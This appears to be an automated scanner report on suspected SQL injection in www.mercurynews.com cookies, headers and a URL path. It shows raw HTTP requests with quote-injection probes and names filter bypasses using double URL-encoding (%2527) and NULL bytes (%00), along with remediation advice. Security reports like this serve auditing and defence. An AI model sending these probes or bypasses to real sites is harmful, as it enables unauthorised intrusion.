<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='As Speaker John A. Pérez reconvened the California Assemblys biennial session Mon ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]... <p>"We will not stand idly by while others force parents back onto the welfare rolls and drive providers to the unemployment line," Pérez said. "Failing to act will cost taxpayers far more than the cost of providing child care." </p> ...[SNIP]...
Request 2
GET /opinion/ci_16798841 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=''
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/opinion/ci_16798841? ...[SNIP]...
The s_cc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_cc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the s_cc cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /scott-herhold/ci_16765193?source=most_emailed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true%2527; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Firths famous plunge for BBC has made him an icon -- even in my house.'><meta name="ke ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /scott-herhold/ci_16765193?source=most_emailed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true%2527%2527; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Firths famous plunge for BBC has made him an icon -- even in my house.'><meta name="ke ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /sharks/ci_16778369?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Referer: http://www.google.com/search?hl=en&q=%2527
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Ferriero scores, but Braun turnover starts scoring rush'><meta name="keywords" content="Sha ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName;
s.channel="Home"; // Same as prop1
s.server="";// Blank
s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /sharks/ci_16778369?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Referer: http://www.google.com/search?hl=en&q=%2527%2527
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/sharks/ci_16778369?s ...[SNIP]...
The __qca cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __qca cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /sharks/ci_16778369?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669%00';
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Ferriero scores, but Braun turnover starts scoring rush'><meta name="keywords" content="Sha ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName;
s.channel="Home"; // Same as prop1
s.server="";// Blank
s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /sharks/ci_16778369?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669%00'';
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/sharks/ci_16778369?s ...[SNIP]...
The fcspersistslider1 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fcspersistslider1 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /sharks/ci_16778369?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1'; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Ferriero scores, but Braun turnover starts scoring rush'><meta name="keywords" content="Sha ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName;
s.channel="Home"; // Same as prop1
s.server="";// Blank
s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /sharks/ci_16778369?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1''; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/sharks/ci_16778369?s ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /sharks/ci_16779655?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Referer: http://www.google.com/search?hl=en&q=%00'
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Setoguchi returns to San Jose for look at injuryMONTREAL -- Injured forward Devin Setoguch ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName;
s.channel="Home"; // Same as prop1
s.server="";// Blank
s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /sharks/ci_16779655?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Referer: http://www.google.com/search?hl=en&q=%00''
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/sharks/ci_16779655?s ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /sharks/ci_16779655?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Setoguchi returns to San Jose for look at injuryMONTREAL -- Injured forward Devin Setoguch ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName;
s.channel="Home"; // Same as prop1
s.server="";// Blank
s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /sharks/ci_16779655?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/sharks/ci_16779655?s ...[SNIP]...
The UserID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /sharks/ci_16779655?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI%00'; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Setoguchi returns to San Jose for look at injuryMONTREAL -- Injured forward Devin Setoguch ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName;
s.channel="Home"; // Same as prop1
s.server="";// Blank
s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /sharks/ci_16779655?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI%00''; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/sharks/ci_16779655?s ...[SNIP]...
The __g_c cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __g_c cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /sharks/ci_16779655?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0%00'; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Setoguchi returns to San Jose for look at injuryMONTREAL -- Injured forward Devin Setoguch ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName;
s.channel="Home"; // Same as prop1
s.server="";// Blank
s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /sharks/ci_16779655?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0%00''; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/sharks/ci_16779655?s ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /sharks'/ci_16785264?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
